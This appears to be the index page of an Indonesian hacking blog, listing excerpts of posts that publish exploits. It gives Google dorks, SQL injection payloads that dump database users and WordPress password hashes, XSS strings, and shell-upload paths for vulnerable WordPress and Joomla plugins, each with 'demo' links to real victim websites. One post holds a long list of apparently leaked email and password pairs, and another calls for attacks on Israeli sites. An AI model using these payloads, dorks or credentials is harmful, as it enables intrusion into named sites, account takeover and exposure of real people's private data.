permintaaan maaf terbuka untuk IBT ( indonesian Backtrack team )

untuk admin dan seluruh member IBT ( Indonesian Backtrack Team ) saya selaku salah satu admin IFC ( indonesian Fighter Cyber ) mewakili 7 admin lainya. dengan ini saya meminta maaf kepada admin ataupun member IBT ( Indonesian Backtrack Team ) karena ketidak sengajaan kami atas kesamaan logo IFC ( http://i.imgur.com/lQbfl.png ) dan IBT ( http://indonesianbacktrack.or.id/forum/ ) dan kami akan segera memperbarui logo...

[ Read more ... ]

Bug XSS di website "australian federal police"

[ type attack ] xss injection [ web vuln ] http://www.afp.gov.au/Search.aspx?searchTerm= [ script injection ] "<script>alert('hey admin this web vuln XSS by X 1n73ct')</script> [ demo ] http://www.afp.gov.au/ ...

[ Read more ... ]

Bug SQL Injection di "Imagine virtual design"

[ type attack ] SQL Injection [ dork ] intext:"Design by imagine virtual" inurl:".php?id=" [ demo ] http://www.incasadesign.com/quadros.php?id=-204' UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16+--+ [ details ] inj3ct0r ...

[ Read more ... ]

Bug file upload di "PDW File Browser"

[ type attack ] temper data [ dork ] inurl:"pdw_file_browser" intext:Upload a new file intitle:PDW File Browser v1.3 intitle:Index of /pdw_file_browser/ intext:Parent Directory  [ shell location ] site.com/pdw_file_browser/img/yourshell.php.jpg site.com/pdw_file_browser/img/yourshell.php  [ demo ] http://dudleycil.org.uk/pdw_file_browser/  [ detail ] inj3c...

[ Read more ... ]

Bug Sql Injection di Joomla Component "com_jooproperty"

[ type attack ] Sql Injection [ dork ] inurl:option=com_jooproperty product_id= [ demo ] http://www.litsabaldaquin.com/short_term_rental/index.php?option=com_jooproperty&view=booking&layout=modal&product_id...

[ Read more ... ]

Bug sql injection di KeenLook developer

[ type attack ] sql injection [ dork Powered By KeenLook inurl:catalogue.php?page= [ demo ] http://www.naskasports.com/catalogue.php?page=42' http://www.lebord.com/catalogue.php?page=2' http://www.cordial-zulco.com/catalogue.php?cid=2'    [ details ] inj3ct0r&nbs...

[ Read more ... ]

Bug sql injectin di "Espacio Ecuador"

[ type attack ] sql injection [ dork ] intext:"developed by Espacio Ecuador"  inurl:id= [ demo ] http://www.mytripecuador.com/ecuador-hotels/hotel.php?id=25 [ details ] http://cxsecurity.com/issue/WLB-2012110...

[ Read more ... ]

Bug sql njection di "Seventeen Design"

[ type attack ] sql injection [ dork ] intext:"Producido por: Seventeen Design." inurl:id= [ demo ] http://www.monteavila.gob.ve/mae/detail_new.php?id=147' [ details ] http://cxsecurity.com/issue/WLB-2012110225...

[ Read more ... ]

Bug file Upload in " Joomla Component com_smartformer"

[ type attack ] tamper data [ dork ] inurl:index.php?option=com_smartformer  inurl:itemid= intext:Upload [ demo ] http://www.goodarch2u.com.my/index.php?option=com_smartformer&Itemid=439&lang=en http://www.finenge.com/en/index.php?option=com_smartformer&Itemid=90 [ shell location ] site/components/com_smartformer/files/yournameshell.php [ details ] http://1337day.com/exploit/19...

[ Read more ... ]

Bug sql injection di plugins "WordPress st_newsletter"

[ type attack ] sql injection [ dork ] allinurl:stnl_iframe.php?newsletter= [ demo ] http://preventcancernow.ca/wp-content/plugins/st_newsletter/stnl_iframe.php?newsletter=...

[ Read more ... ]

Bug sql injection di plugins "WordPress wp-imagezoon"

[ type attack ] sql injection [ dork ] allinurl:wp-imagezoom/zoom.php?id= [ demo ] http://asiasons.com/wp-content/plugins/wp-imagezoom/zoom.php?id=Gn...

[ Read more ... ]

Bug sql injection in "Wordpress dailyedition-mouss Theme"

[ type attack ] SQL injection [ dork ] inurl:fiche-artiste.php?id= inurl:themes/dailyedition-mouss/fiche-artiste.php?id= [ demo ] http://hotnewrap.net/wp-content/themes/dailyedition-mouss/fiche-artiste.php?id=...

[ Read more ... ]

bug file upload di plugins "WordPress Zarzadzanie Kontem" ( ajax file manager )

 lansung saja kita lihat  POC nya [ type attack ] tamper data [ dork ] inurl:"ajaxfilemanager.php?page=" intitle:ajax file manager [ demo ] http://www.madiunkab.go.id/qwerty/filemanager/ajaxfilemanager.php?page=3 http://www.hacker-motor.com/javascript/tiny_mce/plugins/ajaxfilemanager/ajaxfilemanager.php?pag...

[ Read more ... ]

Bug sqli di wordpress Plugin "plg_novana"

[ type attack ] sql injection [ dork ] inurl:novana_detail.php?**id= [ exploit ] /wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=[sql] [ demo ] http://avenuepattaya.net/wp-content/plugins/plg_novana/novana_detail.php?lightbox[width]=700&lightbox[height]=400&id=-35+union+select+1,2,3,4,5,6,7,8,9,group_concat%28user_login,user_pass%29,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+wp_users--  [...

[ Read more ... ]

bug sql injection di "girl.php"

[ type attack ] sql injection [ dork ] inurl:girl.php?id= [ demo ] http://www.btsfashionshow.com/girl.php?id=6 http://www.aramis-london-escorts.com/girl.php?id=301 http://www.pornescort.xxx/girl.php?id=68 <== wajib di hancurkan ...

[ Read more ... ]

10.000 + twiter account

langsung saja goyaa2004@yahoo.co.in:tirumalavipinbe@yahoo.co.in:september24pinak956@rediffmail.com:wrinkygajanan_543@rediffmail.com:gan543soundrenjith@yahoo.com:683557kuldiptiku@gmail.com:familyno1clairefairy1@hotmail.com:truelovesajita.amuthan@gmail.com:rapcce2kashk143@yahoo.com:ashkanujsuriconsult@gmail.com:laundrymsarwar_rao@yahoo.com:sarfraz1400nasir007ng@yahoo.com:kluxklanrajeshmalaviya2008@gmail.com:69717484abdemurshad@yahoo.com:kazim825rajakumari_naidu@yahoo.com:bhb8551cliffabhms@gmail.com:cliffordrobn@inco.com.lb:LRFJrtePrajeevkumartomar@yahoo.com:neelammtamfab@live.com:faithopeokeflex360@yahoo.com:DOCTOR88timi0301debmedina@prodigy.net.mx:deby1234satinsethi@yahoo.co.in:zolo2008thakurvijayk@gmail.com:9415691033seerit@yahoo.com:trainingtropixentertainment@hotmail.com:villagemanojin24@yahoo.com:sigmundjavaidnaqvi05@gmail.com:vespa1978salamhamid@hotmail.com:mahahamid10freehealing@gmail.com:hrs1959shahjahan1663@yahoo.co.in:mumtaazzprasanna.dhal1963@gmail.com:prasanna1963pra_bob@sify.com:thanetysoonverysoon@hotmail.com:mohammadsathiya8@yahoo.com:hayagrivar8majumdarnk@gmail.com:up70h7078siddiqitm@yahoo.co.in:rukhsanazafarhusain2000@yahoo.com:fazli44azam.mahmood@live.com:muhammadravi_rx_dr@yahoo.com:poojaloverahul1191986@rediff.com:1191986stanthedog@talktalk.net:nettle22zoedarling2@hotmail.co.uk:thinair1berenice527@hotmail.com:fiftytwoshashimodi@hotmail.com:shashiagarwaladryogaravi@yahoo.com:yoga7780bharath.bhai@yahoo.com:101981jtikari@gmail.com:intel1224parmindersharma18@gmail.com:bittubuntymmaegraith@aol.com:patr1ckmgabrielpaezza@yahoo.com:sophie1809vpskohli@gmail.com:winkie90tanyacrous@mweb.co.za:alphabetpaulabryden@gmail.com:2$ho3slalichan552@gmail.com:chenakalayil1945sanneo2009@gmail.com:sarika1974doctor_khan2007@yahoo.com:balouch12345anmaadhavan@rediffmail.com:annathuralok8700@gmail.com:nc423apdrakmittra@gmail.com:ellamittrahands4nrg@aol.com:reiki1barbarasymington@hotmail.com:vallartacontact@lizroe-french.co.uk:saffron15deschepperron@skynet.be:robi4552jjmunari@bluewin.ch:biotechmansoorta@hotmail.com:shaistaleenganming07@yahoo.com.hk:e7202850sat8pan@gmail.com:pandegru_karim@hotmail.com:r_712127 jika...

[ Read more ... ]

Bug file upload di "wordpress Plugin tdo-mini-forms"

[ type attack ] tamper data [ dork ] inurl:tdomf-upload-inline.php?tdomf_form_id= intext:Upload [ link upload file ] site/wp-content/uploads/tdomf/tmp/$tdomf_form_id(value)/$user_agent(IP)/$filename.PHP;.jpg [ example ] wp-content/uploads/tdomf/tmp/1/127.0.0.1/z3ro.PHP;.jpg [ demo ] http://www.tutufoundationusa.org/wp-content/plugins/tdo-mini-forms/tdomf-upload-inline.php?tdomf_form_id=1&index= [ details ] http://13...

[ Read more ... ]

Bug sql injection di web israel

ini bukan saatnya kita untuk diam dan duduk manis, ketika saudara-saudara kita di palestina sedang dalam gempuran negara zionis israel ketika warga sipil dan anak-anak menjadi korban  peta palestina 1946 - 2000 ( bagaimana dengan peta negara berdirinya masjidil aqsa itu ) save palestine inurl:index.php?m_id= site:ilinurl:*.php?m_id=...

[ Read more ... ]

Bug file upload di "jQuery-FileUpload"

langsung saja ya [ type attack ] tamper data [ dork ] intitle:upload intext:Add files.. "Start upload" Cancel upload Delete [ vuln ] http://konceptsigngroup.com/jQuery-FileUpload/index.html [ demo ] http://konceptsigngroup.com/jQuery-FileUpload/server/php/thumbnails/anonymous%20muslim....

[ Read more ... ]

Bug File Upload "Plugins Spotlight" di Wordpress

terlepas dari masalah akun facebook saya yang di tendang sama facebook kali ini saya hadir membawa exploit baru :) [ type attack ] tamper data & shell upload [ dork ] intitle:index of /../plugins/spotlightyour/monetize/ intext:Parent Directory "upload/" inurl:wp-content monetize/upload/ intext:Uploading Please wait ... Uploaded Successfully. inurl:wp-content/plugins/spotlightyour/ [ exploit ] http://site/wp-content/plugins/spotlightyour/monetize/upload/ [...

[ Read more ... ]

pengumuman [ saya off dari facebook ]

maaf kawan2 bagi temen2 saya yang ada di facebook saya minta maaf karena akun fb saya tidak aktif gara2 di tendang sama facebook pusat saya sudah tidak bisa masuk lagi di akun x'inject saya tidak tau mengapa saya selalu di tendang sama facebook, apa mungkin saya "buronan" xixixixixi ^_^ saya akan terus buat akun lagi walaupun sampai part 100 selama itu gratis jangan bosan2 add saya tolong sebarkan berita ini di akun saya agar...

[ Read more ... ]

Bug file upload di " TinyBrowser "

hehehe ini sebenarnya hasil dork yang saya kembangkan dari laporan di inj3ct0r langsung saja [ exploit ] [ type attack ] tamper data [ new dork ] inurl:tinybrowser/upload.php intitle:Index of / intext:Parent Directory "tinybrowser/" inurl:/tinybrowser/ intitle:TinyBrowser :: ext:php inurl:tinybrowser/upload.php intext:Enviar Arquivos intitle:TinyBrowser :: Upload inurl:type=image& intext:Enviar Arquivos intitle:TinyBrowser...

[ Read more ... ]

Bug file upload in Joomla "com_autostand"

langsung saja kita lihat exploitnya :) [ type attack ] tamperdata [ dork ] inurl:index.php?option=** func=newItem intext:Select Image Add a Car inurl:index.php?option=** func=newItem intext:Select Image Publish Only available to admin inurl:index.php?option=com_autostand [ poc ] site/inurl:index.php?option=com_autostand&func=newItem [ demo ] http://www.karahan.be//index.php?option=com_autostand&func=newI...

[ Read more ... ]

Bug sql injection di " like.php "

kali ini saya akan posting tentang bug sql injection di like.php langsung saja cekidot :) [ type attack ] sql injection [ dork ] inurl:like.php?id= intext:LikeItNow Script © 2010 [ demo ] http://neonapster.net23.net/like.php?id=34%...

[ Read more ... ]

WELCOME

SELAMAT DATANG DI BLOG SAYA BY X'1N7...

[ Read more ... ]